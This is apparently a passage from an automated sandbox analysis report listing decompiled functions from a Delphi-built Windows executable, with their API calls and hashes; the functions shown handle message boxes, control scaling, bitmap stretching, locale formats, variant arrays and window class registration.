    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$Delete$EnableItem$System
    • String ID:
    • API String ID: 3985193851-0
    • Opcode ID: 1578a015d6a4f16f9d011122d5a6aa6c0f754864a9dfacbbcd4cb5b0edce9c47
    • Instruction ID: b00eb82c13fbf299b1f57cea2b1741d23b11299a1552c6a95d4a4ad9b46c6cb8
    • Opcode Fuzzy Hash: 1578a015d6a4f16f9d011122d5a6aa6c0f754864a9dfacbbcd4cb5b0edce9c47
    • Instruction Fuzzy Hash: C6216AB03403407AF720AF25CD8EF597BD99B15B18F0644A5BA497F2D3CABDB991821C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B554(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				_t40 = __edx;
    				E0040B3BC(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x47a020; // 0x47b044
    				if( *_t14 == 0) {
    					_t16 =  *0x479dfc; // 0x406e3c
    					_t9 = _t16 + 4; // 0xffea
    					_t18 =  *0x47b660; // 0x400000
    					LoadStringA(E00405290(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x479e50; // 0x47b214
    				E00402BB4(E00402D10(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00408640( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40b618, 2,  &_v1092, 0);
    			}

    APIs
      • Part of subcall function 0040B3BC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
      • Part of subcall function 0040B3BC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
      • Part of subcall function 0040B3BC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
      • Part of subcall function 0040B3BC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB
    • CharToOemA.USER32(?,?), ref: 0040B58B
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B5A8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5AE
    • GetStdHandle.KERNEL32(000000F4,0040B618,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5C3
    • WriteFile.KERNEL32(00000000,000000F4,0040B618,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B5C9
    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0040B5EB
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040B601
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
    • String ID: <n@
    • API String ID: 185507032-1603453535
    • Opcode ID: 3c70ff4b161b97992de8a8bdb0083b2ebef119158255d70ea65e91e9ab4b5015
    • Instruction ID: 3337acb7f3d6c81d78a7202f023ff6680b571d3980c66fe4f8ee475db1a1f59a
    • Opcode Fuzzy Hash: 3c70ff4b161b97992de8a8bdb0083b2ebef119158255d70ea65e91e9ab4b5015
    • Instruction Fuzzy Hash: 8D115EB21042047AD200FBA5CC86F9F77ACAB44704F80493BB759F61E2DA79D95487AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042BB64(intOrPtr* __eax, int __ecx, int __edx) {
    				char _t62;
    				signed int _t64;
    				signed int _t65;
    				signed char _t107;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				int _t117;
    				intOrPtr* _t118;
    				int _t119;
    				int* _t121;
    
    				 *_t121 = __ecx;
    				_t117 = __edx;
    				_t118 = __eax;
    				if(__edx ==  *_t121) {
    					L29:
    					_t62 =  *0x42bd10; // 0x0
    					 *((char*)(_t118 + 0x98)) = _t62;
    					return _t62;
    				}
    				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
    					_t107 =  *0x42bd08; // 0x1f
    				} else {
    					_t107 =  *((intOrPtr*)(__eax + 0x98));
    				}
    				if((_t107 & 0x00000001) == 0) {
    					_t119 =  *(_t118 + 0x40);
    				} else {
    					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
    				}
    				if((_t107 & 0x00000002) == 0) {
    					_t121[1] =  *(_t118 + 0x44);
    				} else {
    					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
    				}
    				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
    					_t64 =  *(_t118 + 0x48);
    					_t121[2] = _t64;
    				} else {
    					if((_t107 & 0x00000001) == 0) {
    						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
    						_t121[2] = _t64;
    					} else {
    						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
    						_t121[2] = _t64;
    					}
    				}
    				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
    				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
    					_t121[3] =  *(_t118 + 0x4c);
    				} else {
    					if(_t65 == 0) {
    						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
    					} else {
    						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
    					}
    				}
    				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
    				_t113 =  *0x42bd10; // 0x0
    				if(_t113 != (_t107 &  *0x42bd0c)) {
    					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
    				}
    				_t114 =  *0x42bd10; // 0x0
    				if(_t114 != (_t107 &  *0x42bd14)) {
    					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
    				}
    				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
    					E0041CB08( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041CAEC( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
    				}
    				goto L29;
    			}

    APIs
    • MulDiv.KERNEL32(?,?,?), ref: 0042BB9D
    • MulDiv.KERNEL32(?,?,?), ref: 0042BBB7
    • MulDiv.KERNEL32(?,?,?), ref: 0042BBE5
    • MulDiv.KERNEL32(?,?,?), ref: 0042BBFB
    • MulDiv.KERNEL32(?,?,?), ref: 0042BC33
    • MulDiv.KERNEL32(?,?,?), ref: 0042BC4B
    • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC95
    • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BCBE
    • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042BCE4
      • Part of subcall function 0041CB08: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041CB15
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8ce23d709c76e153ff642a26e6cadc1ed2c57ed492664058bc0ef9bce18cb9c1
    • Instruction ID: bb195871c61b64ae7841912bbad3734f763241822c3d9a27d57236ce26fd63a3
    • Opcode Fuzzy Hash: 8ce23d709c76e153ff642a26e6cadc1ed2c57ed492664058bc0ef9bce18cb9c1
    • Instruction Fuzzy Hash: 11513D70708760AFC320DB6AD885B6BBBE9EF49304F44481EB9D6C7352C779E8408B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E0041DABC(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				struct HDC__* _v28;
    				struct HDC__* _v32;
    				int _v48;
    				int _v52;
    				void _v56;
    				int _t37;
    				void* _t41;
    				int _t43;
    				void* _t47;
    				void* _t72;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				void* _t85;
    				void* _t87;
    				void* _t88;
    				intOrPtr _t89;
    
    				_t87 = _t88;
    				_t89 = _t88 + 0xffffffcc;
    				asm("movsd");
    				asm("movsd");
    				_t71 = __ecx;
    				_v8 = __eax;
    				_push(0);
    				L00406484();
    				_v28 = __eax;
    				_push(0);
    				L00406484();
    				_v32 = __eax;
    				_push(_t87);
    				_push(0x41dc0a);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t89;
    				_t37 = GetObjectA(_v8, 0x18,  &_v56);
    				if(__ecx == 0) {
    					_push(0);
    					L0040677C();
    					_v24 = _t37;
    					if(_v24 == 0) {
    						E0041DA04(__ecx);
    					}
    					_push(_t87);
    					_push(0x41db79);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t89;
    					_push(_v12);
    					_push(_v16);
    					_t41 = _v24;
    					_push(_t41);
    					L0040647C();
    					_v20 = _t41;
    					if(_v20 == 0) {
    						E0041DA04(_t71);
    					}
    					_pop(_t79);
    					 *[fs:eax] = _t79;
    					_push(0x41db80);
    					_t43 = _v24;
    					_push(_t43);
    					_push(0);
    					L004069B4();
    					return _t43;
    				} else {
    					_push(0);
    					_push(1);
    					_push(1);
    					_push(_v12);
    					_t47 = _v16;
    					_push(_t47);
    					L0040646C();
    					_v20 = _t47;
    					if(_v20 != 0) {
    						_t72 = SelectObject(_v28, _v8);
    						_t85 = SelectObject(_v32, _v20);
    						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
    						if(_t72 != 0) {
    							SelectObject(_v28, _t72);
    						}
    						if(_t85 != 0) {
    							SelectObject(_v32, _t85);
    						}
    					}
    					_pop(_t80);
    					 *[fs:eax] = _t80;
    					_push(0x41dc11);
    					DeleteDC(_v28);
    					return DeleteDC(_v32);
    				}
    			}

    APIs
    • GetObjectA.GDI32(?,00000018,?), ref: 0041DAFD
    • 72E7AC50.USER32(00000000,00000000,0041DC0A,?,00000000,00000000), ref: 0041DB20
    • SelectObject.GDI32(?,?), ref: 0041DB8E
    • SelectObject.GDI32(?,00000000), ref: 0041DB9D
    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041DBC9
    • SelectObject.GDI32(?,00000000), ref: 0041DBD7
    • SelectObject.GDI32(?,00000000), ref: 0041DBE5
    • DeleteDC.GDI32(?), ref: 0041DBFB
    • DeleteDC.GDI32(?), ref: 0041DC04
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Object$Select$Delete$Stretch
    • String ID:
    • API String ID: 3399755780-0
    • Opcode ID: dddead4a353e3930485c399ca7392ca3acd0ea7f1cda65b0a4ecde25a83331d3
    • Instruction ID: 8f0f08a69bd8b3cff8dd1e6fb758a95d1ddfbd04ceb6ef4627d768047a618533
    • Opcode Fuzzy Hash: dddead4a353e3930485c399ca7392ca3acd0ea7f1cda65b0a4ecde25a83331d3
    • Instruction Fuzzy Hash: 7B41DFB1E44205BFDB10DBE9DD52FAFB7FCEB08704F110426B605E7281D679A9508B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0040C688(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40c953);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040C510();
    				E0040AF00(__ebx, __edi, __esi);
    				_t196 =  *0x47b744;
    				if( *0x47b744 != 0) {
    					E0040B0D8(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E0040AE50(_t43, 0, 0x14,  &_v20);
    				E00404234(0x47b678, _v20);
    				E0040AE50(_t43, 0x40c968, 0x1b,  &_v24);
    				 *0x47b67c = E00408140(0x40c968, 0, _t196);
    				E0040AE50(_t132, 0x40c968, 0x1c,  &_v28);
    				 *0x47b67d = E00408140(0x40c968, 0, _t196);
    				 *0x47b67e = E0040AE9C(_t132, 0x2c, 0xf);
    				 *0x47b67f = E0040AE9C(_t132, 0x2e, 0xe);
    				E0040AE50(_t132, 0x40c968, 0x19,  &_v32);
    				 *0x47b680 = E00408140(0x40c968, 0, _t196);
    				 *0x47b681 = E0040AE9C(_t132, 0x2f, 0x1d);
    				E0040AE50(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040B188(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00404234(0x47b684, _v36);
    				E0040AE50(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040B188(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00404234(0x47b688, _v44);
    				 *0x47b68c = E0040AE9C(_t132, 0x3a, 0x1e);
    				E0040AE50(_t132, 0x40c99c, 0x28,  &_v52);
    				E00404234(0x47b690, _v52);
    				E0040AE50(_t132, 0x40c9a8, 0x29,  &_v56);
    				E00404234(0x47b694, _v56);
    				E004041E0( &_v12);
    				E004041E0( &_v16);
    				E0040AE50(_t132, 0x40c968, 0x25,  &_v60);
    				_t104 = E00408140(0x40c968, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00404278( &_v8, 0x40c9c0);
    				} else {
    					E00404278( &_v8, 0x40c9b4);
    				}
    				E0040AE50(_t132, 0x40c968, 0x23,  &_v64);
    				_t111 = E00408140(0x40c968, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E0040AE50(_t132, 0x40c968, 0x1005,  &_v68);
    					if(E00408140(0x40c968, 0, _t198) != 0) {
    						E00404278( &_v12, 0x40c9dc);
    					} else {
    						E00404278( &_v16, 0x40c9cc);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404560();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404560();
    				 *0x47b746 = E0040AE9C(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040C95A);
    				return E00404204( &_v68, 0x10);
    			}

    APIs
    • GetThreadLocale.KERNEL32(00000000,0040C953,?,?,00000000,00000000), ref: 0040C6BE
      • Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Locale$InfoThread
    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
    • API String ID: 4232894706-2493093252
    • Opcode ID: ab42ebd72d697db1a999d9231cb4fbe992e286cfce06ad7496da32810eb13b7a
    • Instruction ID: 1b19c9678d7d2d1b90b6f838c7fed646b4145eb3627a011801fd6515b6d9ae5e
    • Opcode Fuzzy Hash: ab42ebd72d697db1a999d9231cb4fbe992e286cfce06ad7496da32810eb13b7a
    • Instruction Fuzzy Hash: 6A612C707002089BDB00FBB6D881B9E77A6DB88704F50957BB644BB3C6DA3CD905979E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040EF1C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				intOrPtr _v792;
    				signed short* _v796;
    				char _v800;
    				char _v804;
    				intOrPtr* _v808;
    				void* __ebp;
    				signed char _t51;
    				signed int _t58;
    				void* _t66;
    				intOrPtr* _t78;
    				intOrPtr* _t96;
    				void* _t98;
    				void* _t100;
    				void* _t103;
    				void* _t104;
    				intOrPtr* _t114;
    				void* _t118;
    				char* _t119;
    				void* _t120;
    
    				_t105 = __ecx;
    				_v780 = __ecx;
    				_t96 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040EB48(0x80070057);
    				}
    				_t51 =  *_t96;
    				if((_t51 & 0x00000fff) != 0xc) {
    					_push(_t96);
    					_push(_v776);
    					L0040D8FC();
    					return E0040EB48(_v776);
    				} else {
    					if((_t51 & 0x00000040) == 0) {
    						_v796 =  *((intOrPtr*)(_t96 + 8));
    					} else {
    						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
    					}
    					_v788 =  *_v796 & 0x0000ffff;
    					_t98 = _v788 - 1;
    					if(_t98 < 0) {
    						L9:
    						_push( &_v772);
    						_t58 = _v788;
    						_push(_t58);
    						_push(0xc);
    						L0040DD50();
    						_v792 = _t58;
    						if(_v792 == 0) {
    							E0040E8A0(_t105);
    						}
    						E0040EE74(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _v792;
    						_t100 = _v788 - 1;
    						if(_t100 < 0) {
    							L14:
    							_t102 = _v788 - 1;
    							if(E0040EE90(_v788 - 1, _t120) != 0) {
    								L0040DD68();
    								E0040EB48(_v796);
    								L0040DD68();
    								E0040EB48(_v792);
    								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
    							}
    							_t66 = E0040EEC0(_t102, _t120);
    						} else {
    							_t103 = _t100 + 1;
    							_t78 =  &_v768;
    							_t114 =  &_v260;
    							do {
    								 *_t114 =  *_t78;
    								_t114 = _t114 + 4;
    								_t78 = _t78 + 8;
    								_t103 = _t103 - 1;
    							} while (_t103 != 0);
    							do {
    								goto L14;
    							} while (_t66 != 0);
    							return _t66;
    						}
    					} else {
    						_t104 = _t98 + 1;
    						_t118 = 0;
    						_t119 =  &_v772;
    						do {
    							_v808 = _t119;
    							_push(_v808 + 4);
    							_t18 = _t118 + 1; // 0x1
    							_push(_v796);
    							L0040DD58();
    							E0040EB48(_v796);
    							_push( &_v784);
    							_t21 = _t118 + 1; // 0x1
    							_push(_v796);
    							L0040DD60();
    							E0040EB48(_v796);
    							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
    							_t118 = _t118 + 1;
    							_t119 = _t119 + 8;
    							_t104 = _t104 - 1;
    						} while (_t104 != 0);
    						goto L9;
    					}
    				}
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EFB5
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040EFD1
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040F00A
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F096
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040F0B5
    • VariantCopy.OLEAUT32(?), ref: 0040F0EA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
    • String ID:
    • API String ID: 351091851-3916222277
    • Opcode ID: 8eadc968cc04d99d259176c1e8707c96ed514381868dcf456482f3187c2b6f4b
    • Instruction ID: 9a7228bb44d863e61a1a4e7368f2eb723a96991d1feacbbd7b1cdcc2aab0c300
    • Opcode Fuzzy Hash: 8eadc968cc04d99d259176c1e8707c96ed514381868dcf456482f3187c2b6f4b
    • Instruction Fuzzy Hash: CA51EA7590021D9BDB26DB59C880BD9B3FCAF48304F0445FAA609F7252D638AF858F69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0042F5C4(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
    				char _v68;
    				struct _WNDCLASSA _v108;
    				intOrPtr _v116;
    				signed char _v137;
    				void* _v144;
    				struct _WNDCLASSA _v184;
    				char _v188;
    				char _v192;
    				char _v196;
    				int _t52;
    				void* _t53;
    				intOrPtr _t86;
    				intOrPtr _t104;
    				intOrPtr _t108;
    				void* _t109;
    				intOrPtr* _t111;
    				void* _t115;
    
    				_t109 = __edi;
    				_t94 = __ebx;
    				_push(__ebx);
    				_v196 = 0;
    				_t111 = __eax;
    				_push(_t115);
    				_push(0x42f785);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t115 + 0xffffff40;
    				_t95 =  *__eax;
    				 *((intOrPtr*)( *__eax + 0x98))();
    				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
    					L7:
    					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
    					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
    					asm("sbb eax, eax");
    					_t53 = _t52 + 1;
    					if(_t53 == 0 || E00428D4C != _v184.lpfnWndProc) {
    						if(_t53 != 0) {
    							UnregisterClassA( &_v68, _v108.hInstance);
    						}
    						_v108.lpfnWndProc = E00428D4C;
    						_v108.lpszClassName =  &_v68;
    						if(RegisterClassA( &_v108) == 0) {
    							E0040CA08(_t94, _t95, _t109, _t111);
    						}
    					}
    					 *0x47995c = _t111;
    					_t96 =  *_t111;
    					 *((intOrPtr*)( *_t111 + 0x9c))();
    					if( *(_t111 + 0x180) == 0) {
    						E0040CA08(_t94, _t96, _t109, _t111);
    					}
    					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
    						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
    					}
    					E004088A4( *((intOrPtr*)(_t111 + 0x64)));
    					 *((intOrPtr*)(_t111 + 0x64)) = 0;
    					E00432878(_t111);
    					E0042D0C4(_t111, E0041C87C( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
    					_t130 =  *((char*)(_t111 + 0x5c));
    					if( *((char*)(_t111 + 0x5c)) != 0) {
    						E00403674(_t111, _t130);
    					}
    					_pop(_t104);
    					 *[fs:eax] = _t104;
    					_push(0x42f78c);
    					return E004041E0( &_v196);
    				} else {
    					_t94 =  *((intOrPtr*)(__eax + 4));
    					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
    						L6:
    						_v192 =  *((intOrPtr*)(_t111 + 8));
    						_v188 = 0xb;
    						_t86 =  *0x479ffc; // 0x41abe4
    						E00405DCC(_t86, _t95,  &_v196);
    						_t95 = _v196;
    						E0040B658(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
    						E00403BF4();
    					} else {
    						_t108 =  *0x428474; // 0x4284c0
    						if(E00403604(_t94, _t108) == 0) {
    							goto L6;
    						}
    						_v116 = E0043260C(_t94);
    					}
    					goto L7;
    				}
    			}

    APIs
    • GetClassInfoA.USER32(?,?,?), ref: 0042F688
    • UnregisterClassA.USER32(?,?), ref: 0042F6B0
    • RegisterClassA.USER32(?), ref: 0042F6C6
    • GetWindowLongA.USER32(00000000,000000F0), ref: 0042F702
    • GetWindowLongA.USER32(00000000,000000F4), ref: 0042F717
    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0042F72A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: ClassLongWindow$InfoRegisterUnregister
    • String ID: @
    • API String ID: 717780171-2766056989
    • Opcode ID: f00d7f8a5151f08e8c8b287d9fabbca050c2df15fd102f582783e03c23d178f4
    • Instruction ID: 7c207c5c5b40817601509759ad44ecd3db77ad52ad9c71fa32a2da123a26c552
    • Opcode Fuzzy Hash: f00d7f8a5151f08e8c8b287d9fabbca050c2df15fd102f582783e03c23d178f4
    • Instruction Fuzzy Hash: 27518030A003549BDB20EF69DC41B9AB7B9EF48708F90457AE445E73A1DB38AD49CF58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetActiveWindow.USER32 ref: 0044B36F
    • GetWindowRect.USER32(?,?), ref: 0044B3C9
    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044B401
    • MessageBoxA.USER32(?,?,?,?), ref: 0044B442
    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044B4B8), ref: 0044B492
    • SetActiveWindow.USER32(?,0044B4B8), ref: 0044B4A3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$Active$MessageRect
    • String ID: (
    • API String ID: 3147912190-3887548279
    • Opcode ID: 515f52ee7629eacb8409f07f6c1ae70dd108bb3a62ad12a948c02f90eec53567
    • Instruction ID: cd14cec1936ef2a5a1d1570e25637d8a351f88fc444e63daf3eca10baf97b1ba
    • Opcode Fuzzy Hash: 515f52ee7629eacb8409f07f6c1ae70dd108bb3a62ad12a948c02f90eec53567
    • Instruction Fuzzy Hash: 0F412D75A00208AFEB04DFA9CD81FAEB7F9EB48704F55846AF505E7392D778AD008B54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E00419668(void* __eax, void* __ebx, void* __edi, void* __esi) {
    				char _v5;
    				intOrPtr* _v12;
    				long _v16;
    				char _v20;
    				char _v24;
    				long _t22;
    				char _t29;
    				void* _t53;
    				intOrPtr _t61;
    				intOrPtr* _t62;
    				intOrPtr _t63;
    				intOrPtr _t66;
    				intOrPtr _t67;
    				void* _t72;
    				void* _t73;
    				intOrPtr _t74;
    
    				_t72 = _t73;
    				_t74 = _t73 + 0xffffffec;
    				_push(__esi);
    				_push(__edi);
    				_t53 = __eax;
    				_t22 = GetCurrentThreadId();
    				_t62 =  *0x47a11c; // 0x47b030
    				if(_t22 !=  *_t62) {
    					_v24 = GetCurrentThreadId();
    					_v20 = 0;
    					_t61 =  *0x479fc0; // 0x410b4c
    					E0040B714(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
    					E00403BF4();
    				}
    				if(_t53 <= 0) {
    					E00419640();
    				} else {
    					E0041964C(_t53);
    				}
    				_v16 = 0;
    				_push(0x47b884);
